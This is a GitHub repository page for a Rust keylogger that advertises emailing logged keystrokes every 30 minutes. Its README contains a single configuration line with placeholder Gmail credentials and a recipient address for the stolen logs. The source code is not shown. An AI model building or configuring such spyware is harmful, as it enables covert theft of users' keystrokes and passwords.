Skip to content

Simple Keylogger written in rust. it sends the logs every 30 minutes to your EMAIL!

Notifications You must be signed in to change notification settings

Pietro222222/KeyLogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

how to use

bruh

emails

to send emails change this line:

   mailer.send_email(("youremail@gmail.com".to_string(), "yourpassword".to_string()), "emailtosendlogs@gmail.com".to_string());

About

Simple Keylogger written in rust. it sends the logs every 30 minutes to your EMAIL!

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages